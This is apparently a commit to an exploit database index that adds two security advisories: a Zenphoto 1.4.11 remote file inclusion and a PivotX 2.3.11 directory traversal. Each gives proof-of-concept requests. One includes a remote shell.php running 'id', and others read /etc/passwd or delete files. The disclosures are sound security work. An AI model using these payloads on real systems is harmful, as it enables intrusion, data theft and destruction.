DB: 2016-03-18
2 new exploits file Zenphoto 1.4.11 - Remote File Inclusion Synology Photo Station 5 DSM 3.2 'photo_one.php' Script Cross Site Scripting Vulnerability Synology Photo Station 5 DSM 3.2 - 'photo_one.php' Script Cross Site Scripting Vulnerability file PivotX 2.3.11 - Directory Traversal
This commit is contained in:
Offensive Security
parent
9deb7ec89d
commit
49a8e7debd
3 changed files with 186 additions and 1 deletions
|
|
@ -13243,6 +13243,7 @@ id,file,description,date,author,platform,type,port
|
|||
15224,platforms/php/webapps/15224.txt,"js calendar 1.5.1 joomla component Multiple Vulnerabilities",2010-10-09,"Salvatore Fresta",php,webapps,0
|
||||
15225,platforms/php/webapps/15225.txt,"videodb <= 3.0.3 - Multiple Vulnerabilities",2010-10-09,Valentin,php,webapps,0
|
||||
15268,platforms/php/webapps/15268.txt,"WikiWebHelp <= 0.3.3 Insecure Cookie Handling Vulnerability",2010-10-17,FuRty,php,webapps,0
|
||||
39571,platforms/php/webapps/39571.txt,"Zenphoto 1.4.11 - Remote File Inclusion",2016-03-17,"Curesec Research Team",php,webapps,80
|
||||
15269,platforms/php/webapps/15269.txt,"Tastydir <= 1.2 (1216) Multiple Vulnerabilities",2010-10-17,R,php,webapps,0
|
||||
15227,platforms/php/webapps/15227.txt,"PHP-Fusion MG User-Fotoalbum SQL Injection Vulnerability",2010-10-10,"Easy Laster",php,webapps,0
|
||||
15592,platforms/php/webapps/15592.txt,"sahitya graphics CMS - Multiple Vulnerabilities",2010-11-21,"Dr.0rYX AND Cr3W-DZ",php,webapps,0
|
||||
|
|
@ -33347,7 +33348,7 @@ id,file,description,date,author,platform,type,port
|
|||
36941,platforms/xml/webapps/36941.txt,"IBM WebSphere Portal Stored Cross-Site Scripting Vulnerability",2015-05-07,"Filippo Roncari",xml,webapps,0
|
||||
36942,platforms/php/webapps/36942.txt,"WordPress Freshmail Plugin <= 1.5.8 - (shortcode.php) SQL Injection",2015-05-07,"Felipe Molina",php,webapps,80
|
||||
36943,platforms/ios/webapps/36943.txt,"Album Streamer 2.0 iOS - Directory Traversal Vulnerability",2015-05-07,Vulnerability-Lab,ios,webapps,0
|
||||
36944,platforms/php/webapps/36944.txt,"Synology Photo Station 5 DSM 3.2 'photo_one.php' Script Cross Site Scripting Vulnerability",2012-03-12,"Simon Ganiere",php,webapps,0
|
||||
36944,platforms/php/webapps/36944.txt,"Synology Photo Station 5 DSM 3.2 - 'photo_one.php' Script Cross Site Scripting Vulnerability",2012-03-12,"Simon Ganiere",php,webapps,0
|
||||
36945,platforms/hardware/remote/36945.txt,"TP-LINK TL-WR740N 111130 - 'ping_addr' Parameter HTML Injection Vulnerability",2012-03-12,l20ot,hardware,remote,0
|
||||
36946,platforms/php/webapps/36946.txt,"Wikidforum 2.10 Advanced Search Multiple Field SQL Injection",2012-03-12,"Stefan Schurtz",php,webapps,0
|
||||
36947,platforms/php/webapps/36947.txt,"Wikidforum 2.10 Search Field XSS",2012-03-12,"Stefan Schurtz",php,webapps,0
|
||||
|
|
@ -35803,3 +35804,4 @@ id,file,description,date,author,platform,type,port
|
|||
39568,platforms/hardware/remote/39568.py,"Cisco UCS Manager 2.1(1b) - Shellshock Exploit",2016-03-16,thatchriseckert,hardware,remote,443
|
||||
39569,platforms/multiple/remote/39569.py,"OpenSSH <= 7.2p1 - xauth Injection",2016-03-16,tintinweb,multiple,remote,22
|
||||
39570,platforms/freebsd_x86-64/dos/39570.c,"FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow",2016-03-16,"Core Security",freebsd_x86-64,dos,0
|
||||
39572,platforms/php/webapps/39572.txt,"PivotX 2.3.11 - Directory Traversal",2016-03-17,"Curesec Research Team",php,webapps,80
|
||||
|
|
|
|||
|
Can't render this file because it is too large.
|
105
platforms/php/webapps/39571.txt
Executable file
105
platforms/php/webapps/39571.txt
Executable file
|
|
@ -0,0 +1,105 @@
|
|||
Security Advisory - Curesec Research Team
|
||||
|
||||
1. Introduction
|
||||
|
||||
Affected Product: Zenphoto 1.4.11
|
||||
Fixed in: 1.4.12
|
||||
Fixed Version Link: https://github.com/zenphoto/zenphoto/archive/
|
||||
zenphoto-1.4.12.zip
|
||||
Vendor Website: http://www.zenphoto.org/
|
||||
Vulnerability Type: RFI
|
||||
Remote Exploitable: Yes
|
||||
Reported to vendor: 01/29/2016
|
||||
Disclosed to 03/15/2016
|
||||
public:
|
||||
Release mode: Coordinated Release
|
||||
CVE: n/a
|
||||
Credits Tim Coen of Curesec GmbH
|
||||
|
||||
2. Overview
|
||||
|
||||
Zenphoto is a CMS for hosting images, written in PHP. In version 1.4.11, it is
|
||||
vulnerable to remote file inclusion. An admin account is required.
|
||||
|
||||
3. Details
|
||||
|
||||
Description
|
||||
|
||||
CVSS: High 8.5 AV:N/AC:M/Au:S/C:C/I:C/A:C
|
||||
|
||||
When downloading a log file, the input is not properly sanitized, leading to
|
||||
RFI.
|
||||
|
||||
An admin account is required, and allow_url_fopen must be set to true - which
|
||||
is the default setting.
|
||||
|
||||
In old versions of PHP, this would additionally lead to LFI via null byte
|
||||
poisoning or path expansion, regardless of allow_url_fopen settings.
|
||||
|
||||
Proof of Concept
|
||||
|
||||
GET /zenphoto-zenphoto-1.4.11/zp-core/admin-logs.php?action=download_log&page=
|
||||
logs&tab=http://localhost/shell.php%3f%78%3d%69%64%26%66%6f%6f%3d&filename=
|
||||
security&XSRFToken=afd5bafed21279d837486fd2beea81f87bc29dea HTTP/1.1
|
||||
|
||||
Code
|
||||
|
||||
// admin-logs.php (sanitize(x, 3) only strips out tags)
|
||||
case 'download_log':
|
||||
$zipname = sanitize($_GET['tab'], 3) . '.zip';
|
||||
if (class_exists('ZipArchive')) {
|
||||
$zip = new ZipArchive;
|
||||
$zip->open($zipname, ZipArchive::CREATE);
|
||||
$zip->addFile($file, basename($file));
|
||||
$zip->close();
|
||||
ob_get_clean();
|
||||
header("Pragma: public");
|
||||
header("Expires: 0");
|
||||
header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
|
||||
header("Cache-Control: private", false);
|
||||
header("Content-Type: application/zip");
|
||||
header("Content-Disposition: attachment; filename=" . basename($zipname) . ";" );
|
||||
header("Content-Transfer-Encoding: binary");
|
||||
header("Content-Length: " . filesize($zipname));
|
||||
readfile($zipname);
|
||||
// remove zip file from temp path
|
||||
unlink($zipname);
|
||||
exit;
|
||||
} else {
|
||||
include_once(SERVERPATH . '/' . ZENFOLDER . '/lib-zipStream.php');
|
||||
$zip = new ZipStream($zipname);
|
||||
$zip->add_file_from_path(internalToFilesystem(basename($file)),internalToFilesystem($file));
|
||||
$zip->finish();
|
||||
}
|
||||
break;
|
||||
|
||||
4. Solution
|
||||
|
||||
To mitigate this issue please upgrade at least to version 1.4.12:
|
||||
|
||||
https://github.com/zenphoto/zenphoto/archive/zenphoto-1.4.12.zip
|
||||
|
||||
Please note that a newer version might already be available.
|
||||
|
||||
5. Report Timeline
|
||||
|
||||
01/29/2016 Informed Vendor about Issue
|
||||
01/29/2016 Vendor replies
|
||||
02/23/2016 Vendor sends fix for verification
|
||||
02/23/2016 Suggested improvements for attempted fix
|
||||
02/29/2016 Delayed Disclosure
|
||||
03/14/2016 Vendor releases fix
|
||||
03/15/2016 Disclosed to public
|
||||
|
||||
|
||||
Blog Reference:
|
||||
https://blog.curesec.com/article/blog/Zenphoto-1411-RFI-156.html
|
||||
|
||||
--
|
||||
blog: https://blog.curesec.com
|
||||
tweet: https://twitter.com/curesec
|
||||
|
||||
Curesec GmbH
|
||||
Curesec Research Team
|
||||
Romain-Rolland-Str 14-24
|
||||
13089 Berlin, Germany
|
||||
78
platforms/php/webapps/39572.txt
Executable file
78
platforms/php/webapps/39572.txt
Executable file
|
|
@ -0,0 +1,78 @@
|
|||
Security Advisory - Curesec Research Team
|
||||
|
||||
1. Introduction
|
||||
|
||||
Affected Product: PivotX 2.3.11
|
||||
Fixed in: not fixed
|
||||
Fixed Version Link: n/a
|
||||
Vendor Website: http://pivotx.net/
|
||||
Vulnerability Type: Directory Traversal
|
||||
Remote Exploitable: Yes
|
||||
Reported to vendor: 01/20/2016
|
||||
Disclosed to public: 03/15/2016
|
||||
Release mode: Full Disclosure
|
||||
CVE: n/a
|
||||
Credits Tim Coen of Curesec GmbH
|
||||
|
||||
2. Overview
|
||||
|
||||
PivotX is a CMS for blogging written in PHP. In version 2.3.11, it is
|
||||
vulnerable to Directory Traversal, allowing authenticated users to read and
|
||||
delete files outside of the PivotX directory.
|
||||
|
||||
3. Details
|
||||
|
||||
Description
|
||||
|
||||
CVSS: Medium 4.0 AV:N/AC:L/Au:S/C:P/I:N/A:N
|
||||
|
||||
The function cleanPath which is responsible for sanitizing path names can be
|
||||
bypassed by an attacker, leading to directory traversal in multiple places.
|
||||
|
||||
Proof of Concept
|
||||
|
||||
Admins and Superadmins can read any file:
|
||||
|
||||
http://localhost/pivotx_latest/pivotx/ajaxhelper.php?function=view&basedir=
|
||||
L3Zhci93d3cvcGl2b3R4X2xhdGVzdC9CYXNlZGlyLwo=&file=../.....//...//.....//.../
|
||||
/.....//...//.....//...//.....//...//.....//...//etc/passwd
|
||||
|
||||
Advanced users, Admins and Superadmins can delete any file, possibly leading to
|
||||
DOS:
|
||||
|
||||
http://localhost/pivotx_latest/pivotx/index.php?page=media&del=.....//.../
|
||||
/.....//...//.....//...//.....//...//.....//...//.....//...//important/
|
||||
important.file&pivotxsession=ovyyn4ob2jc5ym92
|
||||
|
||||
Code
|
||||
|
||||
lib.php
|
||||
function cleanPath($path) {
|
||||
$path = str_replace('../', '', $path);
|
||||
$path = str_replace('..\\', '', $path);
|
||||
$path = str_replace('..'.DIRECTORY_SEPARATOR, '', $path);
|
||||
return $path;
|
||||
}
|
||||
|
||||
4. Solution
|
||||
|
||||
This issue was not fixed by the vendor.
|
||||
|
||||
5. Report Timeline
|
||||
|
||||
01/20/2016 Informed Vendor about Issue
|
||||
01/29/2016 Vendor replies, PivotX is not maintained anymore
|
||||
03/15/2016 Disclosed to public
|
||||
|
||||
|
||||
Blog Reference:
|
||||
https://blog.curesec.com/article/blog/PivotX-2311-Directory-Traversal-154.html
|
||||
|
||||
--
|
||||
blog: https://blog.curesec.com
|
||||
tweet: https://twitter.com/curesec
|
||||
|
||||
Curesec GmbH
|
||||
Curesec Research Team
|
||||
Romain-Rolland-Str 14-24
|
||||
13089 Berlin, Germany
|
||||
Loading…
Add table
Reference in a new issue